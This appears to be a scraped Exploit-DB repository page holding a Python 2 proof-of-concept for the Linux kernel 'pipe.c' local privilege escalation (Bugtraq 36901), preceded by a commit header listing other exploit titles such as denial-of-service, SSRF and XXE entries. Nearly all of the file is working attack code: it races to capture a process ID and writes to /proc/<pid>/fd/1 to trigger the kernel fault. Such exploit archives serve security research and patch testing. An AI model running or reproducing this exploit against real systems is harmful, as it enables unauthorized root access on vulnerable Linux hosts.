5a28a97130
12 changes to exploits/shellcodes jetCast Server 2.0 - Denial of Service (PoC) SpotIM 2.2 - Denial of Service (PoC) SpotPaltalk 1.1.5 - Denial of Service (PoC) ASPRunner.NET 10.1 - Denial of Service (PoC) PHPRunner 10.1 - Denial of Service (PoC) TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery dotCMS 5.1.1 - HTML Injection RICOH SP 4510DN Printer - HTML Injection RICOH SP 4520DN Printer - HTML Injection CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection
28 lines
No EOL
1.1 KiB
Python
Executable file
28 lines
No EOL
1.1 KiB
Python
Executable file
# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
|
|
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
|
|
# PoC by Matthew Bergin
|
|
# Bugtraq ID: 36901
|
|
#
|
|
# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files
|
|
|
|
import os
|
|
import time
|
|
import random
|
|
import subprocess
|
|
#infinite loop
|
|
i = 0
|
|
x = 0
|
|
while (i == 0):
|
|
os.system("sleep 1")
|
|
while (x == 0):
|
|
time.sleep(random.random()) #random int 0.0-1.0
|
|
p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
|
|
result = p.stdout.read()
|
|
pid = result.replace('\n', '').replace('\r', '')
|
|
if (pid == "0"): #need an active pid, race condition applies
|
|
print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
|
|
break
|
|
else:
|
|
print "[+] PID: " + pid
|
|
loc = "echo n > /proc/" + pid + "/fd/1"
|
|
os.system(loc) # triggers the fault, runs via sh |